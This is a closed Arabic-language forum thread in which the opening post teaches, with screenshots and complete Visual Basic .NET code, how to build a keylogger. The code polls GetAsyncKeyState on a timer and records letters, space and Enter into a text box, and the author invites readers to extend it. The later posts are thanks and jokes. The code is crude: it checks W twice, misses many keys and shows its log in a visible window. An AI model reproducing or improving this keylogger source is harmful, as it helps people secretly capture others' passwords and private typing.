حالة الموضوع:
مغلق
  1. سكيورتي ارهابي

    سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    691
    الإعجابات المتلقاة:
    43
    نقاط الجائزة:
    28
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    [​IMG]


    * بـَعـد السـَلامُ يـّحلوُ الكـّلام ، تـطـيـب الأنـفـس وترجتلَ لتعآنقَ ربآبَ المّطر ، *
    * وفي قلوبكُم تسُكن ، لتنجبَ أفرآحاً مُتخمةُ بالآمآل والإنبسآطُ *
    * مساءَ لكمُ قـد أرخىَ سدولهُ لىَ موآطنَ الرقصاتَ الإبدآعيةَ ،*
    * خلونا ندخلَ بالموضُوع علىَ طوُول حتى نختصَر الوقِت ،*
    * نـعـُود لكُم بـكَـل مُميز وحصَري علَى آرض اِلابداع {عراق تيم}

    [​IMG]
    بسم الله الرحمن الرحيم اخباركم حبايبي ان شاء الله بخير اليوم موضوعنا يخص حول صنع كيلوجر
    بسيط جدا راح نحتاج الى فيجوال بيسك 2010/ 2012


    [​IMG]


    اولا نقوم بفتح مشروع جديد


    [​IMG]


    ثانيا نقوم بتسميه اسم المشروع اي اسم يعجبك انا سوف اتركه كما كان
    ---------------------
    [​IMG]


    ---------------------
    ثالثا نقوم بأضافه


    1 Rich Text Box + Timer


    [​IMG]




    -------------------------


    [​IMG]




    نجعل Rich Box على كل الفورم


    [​IMG]


    الان نقوم بأستعراض كود التايمر


    نضع الكود التالي تحت الـ -Public ClassForm1


    Public Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Int32) As Int16


    يكون بهذا الشكل
    [​IMG]


    [​IMG]




    وهذا الكود نضعه تحت ال Timer1


    [Dim hotkey1 As Boolean
    hotkey1
    = GetAsyncKeyState(Keys.A)
    If
    hotkey1 = True Then
    RichTextBox1
    .SelectedText = "A"
    End If
    Dim hotkey2 As Boolean
    hotkey2
    = GetAsyncKeyState(Keys.B)
    If
    hotkey2 = True Then
    RichTextBox1
    .SelectedText = "B"
    End If

    Dim hotkey3 As Boolean
    hotkey3
    = GetAsyncKeyState(Keys.C)
    If
    hotkey3 = True Then
    RichTextBox1
    .SelectedText = "C"
    End If

    Dim hotkey4 As Boolean
    hotkey4
    = GetAsyncKeyState(Keys.D)
    If
    hotkey4 = True Then
    RichTextBox1
    .SelectedText = "D"
    End If

    Dim hotkey5 As Boolean
    hotkey5
    = GetAsyncKeyState(Keys.E)
    If
    hotkey5 = True Then
    RichTextBox1
    .SelectedText = "E"
    End If

    Dim hotkey6 As Boolean
    hotkey6
    = GetAsyncKeyState(Keys.F)
    If
    hotkey6 = True Then
    RichTextBox1
    .SelectedText = "F"
    End If

    Dim hotkey7 As Boolean
    hotkey7
    = GetAsyncKeyState(Keys.G)
    If
    hotkey7 = True Then
    RichTextBox1
    .SelectedText = "G"
    End If

    Dim hotkey8 As Boolean
    hotkey8
    = GetAsyncKeyState(Keys.H)
    If
    hotkey8 = True Then
    RichTextBox1
    .SelectedText = "H"
    End If

    Dim hotkey9 As Boolean
    hotkey9
    = GetAsyncKeyState(Keys.I)
    If
    hotkey9 = True Then
    RichTextBox1
    .SelectedText = "I"
    End If

    Dim hotkey10 As Boolean
    hotkey10
    = GetAsyncKeyState(Keys.J)
    If
    hotkey10 = True Then
    RichTextBox1
    .SelectedText = "J"
    End If

    Dim hotkey11 As Boolean
    hotkey11
    = GetAsyncKeyState(Keys.K)
    If
    hotkey11 = True Then
    RichTextBox1
    .SelectedText = "K"
    End If

    Dim hotkey12 As Boolean
    hotkey12
    = GetAsyncKeyState(Keys.L)
    If
    hotkey12 = True Then
    RichTextBox1
    .SelectedText = "L"
    End If

    Dim hotkey13 As Boolean
    hotkey13
    = GetAsyncKeyState(Keys.M)
    If
    hotkey13 = True Then
    RichTextBox1
    .SelectedText = "M"
    End If

    Dim hotkey14 As Boolean
    hotkey14
    = GetAsyncKeyState(Keys.N)
    If
    hotkey14 = True Then
    RichTextBox1
    .SelectedText = "N"
    End If

    Dim hotkey15 As Boolean
    hotkey15
    = GetAsyncKeyState(Keys.O)
    If
    hotkey15 = True Then
    RichTextBox1
    .SelectedText = "O"
    End If

    Dim hotkey16 As Boolean
    hotkey16
    = GetAsyncKeyState(Keys.P)
    If
    hotkey16 = True Then
    RichTextBox1
    .SelectedText = "P"
    End If

    Dim hotkey17 As Boolean
    hotkey17
    = GetAsyncKeyState(Keys.Q)
    If
    hotkey17 = True Then
    RichTextBox1
    .SelectedText = "Q"
    End If

    Dim hotkey18 As Boolean
    hotkey18
    = GetAsyncKeyState(Keys.R)
    If
    hotkey18 = True Then
    RichTextBox1
    .SelectedText = "R"
    End If

    Dim hotkey19 As Boolean
    hotkey19
    = GetAsyncKeyState(Keys.S)
    If
    hotkey19 = True Then
    RichTextBox1
    .SelectedText = "S"
    End If

    Dim hotkey20 As Boolean
    hotkey20
    = GetAsyncKeyState(Keys.T)
    If
    hotkey20 = True Then
    RichTextBox1
    .SelectedText = "T"
    End If

    Dim hotkey21 As Boolean
    hotkey21
    = GetAsyncKeyState(Keys.U)
    If
    hotkey21 = True Then
    RichTextBox1
    .SelectedText = "U"
    End If

    Dim hotkey22 As Boolean
    hotkey22
    = GetAsyncKeyState(Keys.V)
    If
    hotkey22 = True Then
    RichTextBox1
    .SelectedText = "V"
    End If

    Dim hotkey23 As Boolean
    hotkey23
    = GetAsyncKeyState(Keys.X)
    If
    hotkey23 = True Then
    RichTextBox1
    .SelectedText = "X"
    End If

    Dim hotkey24 As Boolean
    hotkey24
    = GetAsyncKeyState(Keys.Y)
    If
    hotkey24 = True Then
    RichTextBox1
    .SelectedText = "Y"
    End If

    Dim hotkey25 As Boolean
    hotkey25
    = GetAsyncKeyState(Keys.Z)
    If
    hotkey25 = True Then
    RichTextBox1
    .SelectedText = "Z"
    End If

    Dim hotkey26 As Boolean
    hotkey26
    = GetAsyncKeyState(Keys.Space)
    If
    hotkey26 = True Then
    RichTextBox1
    .SelectedText = " "
    End If

    Dim hotkey27 As Boolean
    hotkey27
    = GetAsyncKeyState(Keys.Enter)
    If
    hotkey27 = True Then
    RichTextBox1
    .SelectedText = vbNewLine
    End
    If

    Dim hotkey28 As Boolean
    hotkey28
    = GetAsyncKeyState(Keys.W)
    If
    hotkey28 = True Then
    RichTextBox1
    .SelectedText = "W"
    End If

    Dim hotkey29 As Boolean
    hotkey29
    = GetAsyncKeyState(Keys.W)
    If
    hotkey29 = True Then
    RichTextBox1
    .SelectedText = "W"
    End If
    ]
    -----------------------------------------------------
    بعد ما اكملنا نذهب الى خصائص التايمر ونجعلها
    كما في الصوره



    [​IMG]


    بعد ما نكتمل اعمل
    build
    ومبروك عليك ال
    keyloger
    وتقدر تطوره بنفسك
    الى هنا انتهى الشرح نلتقيكم في موضوع اخر اتنمى لكم الموفقيه
    في امان الله


    [​IMG]

     
  2. جـعـفـر الـشـمـري

    جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    18
    الإقامة:
    العراق
    رد: تــــــعـــــال واصنع keyloger بنفسك بواسطه VB.NET

    بارك الله بيك {1!$7}
     
  3. سكيورتي ارهابي

    سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    691
    الإعجابات المتلقاة:
    43
    نقاط الجائزة:
    28
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    رد: تــــــعـــــال واصنع keyloger بنفسك بواسطه VB.NET

    شكرا :lolًٌُ:ٌ للمرور :ُeُeT: حبيبي
     
  4. !•¢-Άss£R-ΆℓrOoOԊ•¢-!

    !•¢-Άss£R-ΆℓrOoOԊ•¢-! اعرض من مثلث برمودة DeveloPer Plus موقوف لمخالفة الشروط

    الأنتساب:
    ‏16 يناير 2015
    المشاركات:
    430
    الإعجابات المتلقاة:
    16
    نقاط الجائزة:
    18
    الجنس:
    أنثى
    الإقامة:
    مدينه الصدر
    رد: تــــــعـــــال واصنع keyloger بنفسك بواسطه VB.NET

    ~~بارك الله بيك حبيبي اموري شرح وافي~~
     
  5. سكيورتي ارهابي

    سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    691
    الإعجابات المتلقاة:
    43
    نقاط الجائزة:
    28
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    مين اموري هذا هههه علي وليس اموري نورت اخي
     
  6. A-R

    A-R Developer

    الأنتساب:
    ‏2 يوليو 2015
    المشاركات:
    346
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الإقامة:
    العراق العظيم
    رد: تــــــعـــــال واصنع keyloger بنفسك بواسطه VB.NET

    عاشت ايدك احسنت ننتضر جديدك​
     
  7. سكيورتي ارهابي

    سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    691
    الإعجابات المتلقاة:
    43
    نقاط الجائزة:
    28
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    رد: تــــــعـــــال واصنع keyloger بنفسك بواسطه VB.NET

    شكرا للمرور حبيبي ان شاء الله نفيد الاخرين


    {1!$1}
     
  8. الحسن هادي

    الحسن هادي DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    300
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الوظيفة:
    طالب ثانوي
    الإقامة:
    .:: العراق ::.
    رد: تــــــعـــــال واصنع keyloger بنفسك بواسطه VB.NET

    خطير جدآ ~ انا من قريت العنوآن اهتزيت [​IMG] ، الصرآحة الموضوع متعوب عليه ، و يستحق التقييم بالخماسي ، احسنت و بارك الله بيك ،
    دآئما تنور المنتدى بمواضيعك الحلوة ~ يعطيك العافية وردة {1!$7}{1!$7}{1!$7}
    منتظر جديدك ~ واصل ، موفق وردة [​IMG]
     
  9. سكيورتي ارهابي

    سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    691
    الإعجابات المتلقاة:
    43
    نقاط الجائزة:
    28
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    رد: تــــــعـــــال واصنع keyloger بنفسك بواسطه VB.NET

    هههههه والله انك خطير جدا بتمزح معي هههههه نورت اخي شكرا للمرورك


    :ُeُeQ::ُeُeQ:
     
  10. ahmednajeh98

    ahmednajeh98 Developer

    الأنتساب:
    ‏16 أكتوبر 2015
    المشاركات:
    111
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: تــــــعـــــال واصنع keyloger بنفسك بواسطه VB.NET

    مشكور ضلع
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة